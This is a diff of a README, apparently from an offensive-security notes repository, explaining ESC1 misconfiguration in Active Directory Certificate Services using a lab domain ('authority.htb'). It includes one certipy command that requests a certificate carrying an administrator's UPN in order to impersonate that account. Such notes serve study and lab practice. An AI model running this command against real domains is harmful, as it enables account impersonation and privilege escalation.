b-sct/LDAP/ADCS/README.md

   }
 ```

-for example, the template 'CorpVPN' is vulnerable ESC1, where an enrolle from the Domain Computers security group can supply a subject for client authentication.
+for example, the template 'CorpVPN' is vulnerable to 'ESC1', where an enrolle from the Domain Computers security group can supply a subject for client authentication, effectively allowing the impersonation of users in the domain.

 ### Exploitation

-An attacker with a user or machine account with an enrollment right would request a certificate with the UPN of the target account:
+An attacker with a user or machine account with an enrollment right would request a certificate with the UPN of the victim account:
 ```$ certipy req -u 'pc01$' -p 'password' -template CorpVPN -upn 'administrator@authority.htb -target authority.authority.htb -ca AUTHORITY-CA'```

 ```